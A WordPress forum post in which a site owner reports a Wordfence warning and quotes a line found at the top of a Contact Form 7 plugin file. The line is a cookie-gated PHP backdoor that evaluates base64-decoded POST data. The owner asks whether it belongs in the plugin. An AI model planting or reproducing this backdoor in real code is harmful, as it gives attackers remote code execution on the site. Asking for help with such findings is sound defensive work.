Suspicious code in Contact Form 7 Plugin?

  • Resolved yamahaforums

    (@yamahaforums)


    11 years, 11 months ago

    Just ran Wordfence on a site that had been hacked in the past and it’s flagging a number of critical warnings, all within the theme apart from one in Contact Form 7.

    At the beginning of the CFDBShortcodeCount.php file it has this line:
    <?php if(isset($_COOKIE[‘LKIaNzY’])&&md5($_COOKIE[‘LKIaNzY’])==”165c62a98c16d26913eb382884a88fa7″){ eval(base64_decode($_POST[‘HPZDRrjNosgcXfITqtxzaM’])); exit; }?><?php

    I think the problem bit is eval(base64_decode which I know hackers use a lot but I just wanted to confirm that this code should not appear in this plugin?

    Many thanks.

    https://wordpress.org/plugins/contact-form-7/

Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Suspicious code in Contact Form 7 Plugin?’ is closed to new replies.